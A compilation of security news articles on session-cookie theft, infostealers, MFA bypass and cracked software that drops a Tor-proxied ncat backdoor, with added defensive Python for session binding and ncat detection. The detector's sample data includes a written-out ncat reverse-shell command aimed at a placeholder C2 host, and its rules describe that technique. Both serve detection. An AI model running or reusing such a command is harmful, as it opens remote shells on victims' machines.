
Session Hijacking Surges: Attackers Exploit MFA Gaps with Modern Tactics

 

As multi-factor authentication (MFA) becomes more common, attackers are increasingly resorting to session hijacking. Evidence from 2023 shows this trend: Microsoft detected 147,000 token replay attacks, marking a 111% increase year-over-year. Google reports that attacks on session cookies now rival traditional password-based threats.

Session hijacking has evolved from old Man-in-the-Middle (MitM) attacks, which relied on intercepting unsecured network traffic. Today, these attacks are internet-based, focusing on cloud apps and services. Modern session hijacking involves stealing session materials like cookies and tokens, enabling attackers to bypass standard security controls like VPNs, encrypted traffic, and even MFA.

The rise of identity-based attacks is a result of the growing complexity of user accounts, with each person managing multiple cloud-based services. Once attackers gain access to an active session, they can bypass MFA, leveraging the valid session tokens, which often stay active longer than expected.

Modern phishing toolkits, such as adversary-in-the-middle (AitM) and browser-in-the-middle (BitM) kits, make hijacking easier by letting attackers intercept the MFA exchange or trick users into working inside a browser session the attacker controls. Infostealers, a newer class of tool, capture session cookies straight from the victim's browser, putting every application the victim is logged into at risk, especially when EDR systems fail to detect them.

Infostealer infections are often traced back to unmanaged personal devices, which sync browser profiles with work devices, leading to the compromise of corporate credentials. EDRs aren’t always reliable in stopping these threats, and attackers can still resume stolen sessions without re-authentication, making it difficult for organizations to detect unauthorized access.

Passkeys offer some protection by preventing phishing, but infostealers bypass authentication entirely. While app-level controls exist to detect unauthorized sessions, many are inadequate. Companies are now considering browser-based solutions that monitor user agent strings for signs of session hijacking, offering a last line of defense against these sophisticated attacks.

Stolen Session Cookies Turn Into the Next Cyber Threat


According to the recent Identity Exposure Report by SpyCloud, 87,000 credentials linked to Fortune 1000 C-level executives were recovered from the criminal underworld in 2022. Security leaders across organizations continue to live in constant fear of becoming the victim of a cyberattack, and for good reason.

Cybercriminals can use exposed assets such as usernames and passwords to access networks and commit crimes including fraud, session hijacking, account takeover, and ransomware attacks. Even as companies strengthen their security tactics, for example by adding user authentication such as multifactor authentication and passkeys, criminals keep refining their methods to bypass these high-end barriers. One method threat actors commonly use is session hijacking with stolen active session cookies, which defeats the effectiveness of the conventional safeguards.

To improve their network defenses and safeguard their customers, organizations and security experts need a better understanding of the methods criminals use to commit cybercrime, including how they turn stolen data into profit.

Session Cookies 

Session cookies are everywhere online: websites and applications assign a cookie or token to identify each user. That string of characters is stored on the device so the user can return without signing in again.

While this provides a personalized and smooth experience for users, it becomes harmful when the data falls into the wrong hands. Using infostealer malware, cybercriminals can exfiltrate cookies and a variety of other data from infected computers and import them into their own browsers in a way that is hard to detect, letting them pose as the legitimate user in a process known as session hijacking.

Impersonating a legitimate user, a threat actor can freely move through the network, committing fraud, assisting a ransomware attack, stealing important company data, and more. No matter how the user signed in—using a username and password, a passkey, or by successfully completing the multifactor authentication (MFA) requirements—the session cookie still vouches for the user's identity.

Infostealers are hard to detect, cheap to acquire (normally available online for only a few dollars per month), and routinely succeed in stealing cookies and other fresh, high-quality data, all of which has made infostealer quality soar.

Protecting Businesses and Their Customers

According to SpyCloud data, cookie theft is already fairly frequent: criminals seized over 22 billion device and session cookie records last year. This entry point will keep expanding because fraudsters are having great success accessing accounts and businesses with these cookies. For organizations trying to protect their bottom line, a strategy to proactively disrupt criminal operations is a vital requirement.

Recently developed malware is difficult to detect because it is carefully crafted. Common infostealers frequently leave little to no evidence of infection on the victim's device and exfiltrate sensitive data in a matter of seconds.

However, there are measures organizations can adopt to reduce the risk from this malware:

  • Educating employees about these threats has become crucial. Employees alone can reduce overall malware exposure by identifying phishing attempts, exercising caution when using unmanaged or poorly maintained devices to access corporate systems and networks, not sharing passwords, and being aware of potentially harmful email attachments, websites, and downloads.
  • The risk of session hijacking is reduced by removing "remember me" options on platform login pages and regularly clearing browser cookies, so that thieves cannot obtain a long-lived active session cookie even in the event of a malware infection.
  • Security teams can gain a comprehensive picture of the compromised devices and data threatening their firms by using darknet data that has been ingested, vetted, and evaluated. With this insight, teams can invalidate open session cookies, reset the exposed application data, and patch any remaining vulnerabilities. By addressing stolen data before it escalates into a full-blown security incident, this strategy limits the harm to the enterprise.
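The user-agent monitoring mentioned in the first post and the "invalidate open session cookies" measure above can be implemented server-side as a session store that binds each cookie to the browser that created it and enforces idle and absolute lifetimes. This is an added illustration, not code from SpyCloud or any product named on the page; the `SessionStore` class, its timeouts and its alert format are assumptions.

```python
import hashlib
import secrets
import time

IDLE_TIMEOUT = 15 * 60        # seconds of inactivity before a session dies
ABSOLUTE_TIMEOUT = 8 * 3600   # hard lifetime, regardless of activity


class SessionStore:
    """In-memory session store (hypothetical) that binds each session to the
    client's user agent and expires it on idle/absolute timeouts."""

    def __init__(self):
        self._sessions = {}   # session id -> record
        self.alerts = []      # detection events a SOC would consume

    @staticmethod
    def _fingerprint(user_agent):
        # The user agent is spoofable, so treat a mismatch as a signal for
        # revocation and alerting, not as proof of the client's identity.
        return hashlib.sha256(user_agent.encode()).hexdigest()

    def create(self, user, user_agent, now=None):
        now = time.time() if now is None else now
        sid = secrets.token_urlsafe(32)   # 256-bit random session id
        self._sessions[sid] = {"user": user, "fp": self._fingerprint(user_agent),
                               "created": now, "last_seen": now}
        return sid

    def validate(self, sid, user_agent, now=None):
        """Return the user if the cookie is valid, else None. A cookie replayed
        from a different browser is revoked and recorded as an alert."""
        now = time.time() if now is None else now
        s = self._sessions.get(sid)
        if s is None:
            return None
        if now - s["last_seen"] > IDLE_TIMEOUT or now - s["created"] > ABSOLUTE_TIMEOUT:
            del self._sessions[sid]
            return None
        if s["fp"] != self._fingerprint(user_agent):
            self.alerts.append({"user": s["user"], "reason": "user-agent mismatch"})
            del self._sessions[sid]
            return None
        s["last_seen"] = now
        return s["user"]

    def revoke_user(self, user):
        """Invalidate every open session for a user, e.g. after a darknet exposure."""
        doomed = [sid for sid, s in self._sessions.items() if s["user"] == user]
        for sid in doomed:
            del self._sessions[sid]
        return len(doomed)
```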

Cracked Versions of Some Software Steal Session Cookies and Monero Cryptocurrency

 

Bitdefender, a cybersecurity company based in Bucharest, Romania, recently warned that cracked versions of Microsoft Office and Adobe Photoshop steal browser session cookies and Monero cryptocurrency from the tightwads who install the pirated apps.

As most readers will know, cracked software is a genuine application whose registration or licensing checks have been removed. In the past, cracked software (also known as warez) was mainly exchanged over BitTorrent and mostly attracted freeloaders who wanted to use a particular suite without paying for a license.

However, these cracks come at a different price: Bitdefender observed that some versions of both suites are being circulated with malware that captures browser session cookies (or, in Firefox, the complete user profile history). The malware first opens a backdoor and disables the machine's firewall, then hijacks Monero cryptocurrency deposits and exfiltrates selected data over BitTorrent.


"Once executed, the crack drops an instance of ncat.exe (a legitimate tool to send raw data over the network) as well as a Tor proxy," said Bogdan Botezatu, Bitdefender's director of threat research and reporting, and security researcher Eduard Budaca. They added: "The tools work together to create a powerful backdoor that communicates through TOR with its command-and-control center: the ncat binary uses the listening port of the TOR proxy ('--proxy 127.0.0.1:9075') and uses the standard '--exec' parameter, which allows all input from the client to be sent to the application and responses to be sent back to the client over the socket (reverse shell behavior)."
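The behaviour Bitdefender describes is easy to spot in process-creation telemetry: a dropped ncat.exe that proxies through a local listener and binds a program to the socket with --exec. The detection logic below is an added example (not Bitdefender's), run over constructed Sysmon-like events; the event format, the `classify_event` function and the placeholder C2 host are assumptions.

```python
import re

# Constructed sample events in a simplified Sysmon-like layout; not real telemetry.
SAMPLE_EVENTS = [
    r'Image=C:\Users\bob\AppData\Local\Temp\ncat.exe CommandLine="ncat.exe --proxy 127.0.0.1:9075 --exec cmd.exe C2_HOST_PLACEHOLDER 443"',
    r'Image=C:\Program Files\Nmap\ncat.exe CommandLine="ncat.exe -zv 10.0.0.5 443"',
    r'Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe report.txt"',
]

EVENT_RE = re.compile(r'Image=(?P<image>.*?)\s+CommandLine="(?P<cmd>.*)"$')


def classify_event(event):
    """Return a finding for a suspicious ncat.exe execution, or None."""
    m = EVENT_RE.match(event)
    if not m:
        return None
    image, args = m.group("image"), m.group("cmd").split()
    if not image.lower().endswith("ncat.exe"):
        return None
    reasons = []
    # ncat dropped into a user-writable location rather than an install directory
    if "\\temp\\" in image.lower() or "\\appdata\\" in image.lower():
        reasons.append("ncat.exe running from a user-writable path")
    # --proxy pointing at a loopback listener is how the crack rides the Tor proxy
    for i, a in enumerate(args):
        if a == "--proxy" and i + 1 < len(args) and args[i + 1].startswith("127.0.0.1:"):
            reasons.append("proxies through a local listener on " + args[i + 1])
    # --exec / -e attach a program to the socket: the reverse-shell behaviour quoted above
    if "--exec" in args or "-e" in args:
        reasons.append("--exec binds a program to the network socket")
    if not reasons:
        return None
    return {"image": image, "severity": "high" if len(reasons) >= 2 else "medium",
            "reasons": reasons}


def scan(events):
    """Run classify_event over a batch of events and keep the findings."""
    return [f for f in (classify_event(e) for e in events) if f]
```

A plain `ncat -zv` port check from the Nmap install directory produces no finding, so the rule keys on the combination of behaviours rather than on the binary name alone.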


Reportedly, the operators take some time to analyze a compromised machine and decide whether it is worth robbing, depending on the value they estimate they could gain from it.

Before software-as-a-service business models in the cloud became feasible, vendors depended entirely on physical media to deliver the whole program to end users. Copy protection was an immediate and common target for crackers, which resulted in unlawful copies of otherwise fully functioning software being sold at a much lower cost.

“Pirated software is never the way to go, however tempting it may be, as the risks tend to always outweigh the benefits,” sources further noted.